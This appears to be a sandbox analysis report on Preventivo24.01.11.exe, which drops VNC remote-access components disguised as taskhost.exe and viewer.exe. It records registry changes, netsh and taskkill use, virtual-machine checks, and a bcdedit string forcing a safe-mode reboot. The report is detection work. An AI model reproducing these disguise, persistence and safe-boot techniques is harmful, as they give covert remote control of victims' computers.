Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_05508EAF push es; iretd	0_3_05508EBA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054EFF47 push edx; ret	0_3_054EFF59
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054EFF67 push esi; ret	0_3_054EFF79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054F932D pushfd ; retf	0_3_054F9332
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054EFD27 push ds; ret	0_3_054EFD39
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054EFD3A push ss; ret	0_3_054EFD79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054EFD83 push ss; ret	0_3_054EFD79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054F83A7 push ds; retf	0_3_054F83A8
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054F760B push cs; retf	0_3_054F760C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054F841B push ds; retf	0_3_054F841C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00AFA4B0 push ecx; mov dword ptr [esp], 3F800000h	0_2_00AFA60F
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BEB2DE push ecx; ret	0_2_00BEB2F1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009FFB10 push ecx; mov dword ptr [esp], ecx	0_2_009FFB11
Source: C:\Games\viewer.exe	Code function: 7_2_009850CC push ecx; ret	7_2_009850DF
Source: C:\Games\viewer.exe	Code function: 7_2_00985676 push ecx; ret	7_2_00985689
Source: C:\Games\taskhost.exe	Code function: 42_2_006C6143 push ecx; ret	42_2_006C6156
Source: C:\Games\taskhost.exe	Code function: 42_2_005851FF pushad ; iretd	42_2_00585218
Source: C:\Games\taskhost.exe	Code function: 42_2_0058E25B pushad ; iretd	42_2_0058E25C
Source: C:\Games\taskhost.exe	Code function: 42_2_0058E27D pushad ; iretd	42_2_0058E27E
Source: C:\Games\taskhost.exe	Code function: 42_2_0058E275 pushad ; iretd	42_2_0058E276
Source: C:\Games\taskhost.exe	Code function: 42_2_0058E263 pushad ; iretd	42_2_0058E264
Source: C:\Games\taskhost.exe	Code function: 42_2_00585265 push 60F5C5F1h; iretd	42_2_00585278
Source: C:\Games\taskhost.exe	Code function: 42_2_0058E5FB pushad ; iretd	42_2_0058E5FC
Source: C:\Games\taskhost.exe	Code function: 42_2_0058C5A6 pushad ; iretd	42_2_0058C5A9
Source: C:\Games\taskhost.exe	Code function: 42_2_0058E61D pushad ; iretd	42_2_0058E61E
Source: C:\Games\taskhost.exe	Code function: 42_2_0058E615 pushad ; iretd	42_2_0058E616

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI5406.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\shi5398.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI54C4.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI54A3.tmp	Jump to dropped file

Source: taskhost.exe.0.dr	Binary or memory string: bcdedit.exe
Source: taskhost.exe.0.dr	Binary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------

Source: C:\Games\taskhost.exe	Code function: 42_2_005AAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,	42_2_005AAEE0
Source: C:\Games\taskhost.exe	Code function: 42_2_005A7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,	42_2_005A7AE0
Source: C:\Games\taskhost.exe	Code function: 42_2_005B37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC,	42_2_005B37A0

Source: C:\Games\viewer.exe

Code function: 7_2_00983D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00983D28

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Games\viewer.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Games\taskhost.exe

Code function: 42_2_005A57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle,

42_2_005A57B0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi5398.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI54C4.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	Jump to dropped file

Source: C:\Games\taskhost.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Games\viewer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-63242

Source: C:\Games\viewer.exe

API coverage: 5.1 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 5280	Thread sleep count: 166 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7864	Thread sleep count: 182 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7084	Thread sleep count: 170 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B46F90 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	0_2_00B46F90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B49080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,	0_2_00B49080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A05220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,	0_2_00A05220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B1D700 FindFirstFileW,GetLastError,FindClose,	0_2_00B1D700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B68B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_00B68B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B1CDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,	0_2_00B1CDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B43210 FindFirstFileW,FindClose,	0_2_00B43210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00AFF570 FindFirstFileW,FindNextFileW,FindClose,	0_2_00AFF570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B53790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_00B53790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B53C10 FindFirstFileW,FindClose,	0_2_00B53C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B2BFF0 FindFirstFileW,FindClose,FindClose,	0_2_00B2BFF0
Source: C:\Games\viewer.exe	Code function: 7_2_0099BC3B FindFirstFileExW,	7_2_0099BC3B
Source: C:\Games\taskhost.exe	Code function: 42_2_0059EC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,	42_2_0059EC90

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B52400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,

0_2_00B52400

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00BE7833 VirtualQuery,GetSystemInfo,

0_2_00BE7833

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\	Jump to behavior

Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: , (Hyper-V Server)
Source: viewer.exe, 00000010.00000002.3220368505.0000000001449000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005553000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2031375134.0000000005553000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1988431156.0000000005554000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: Preventivo24.01.11.exe, 00000000.00000002.2033997046.000000000552D000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1988431156.0000000005533000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2031375134.000000000552D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWKe%
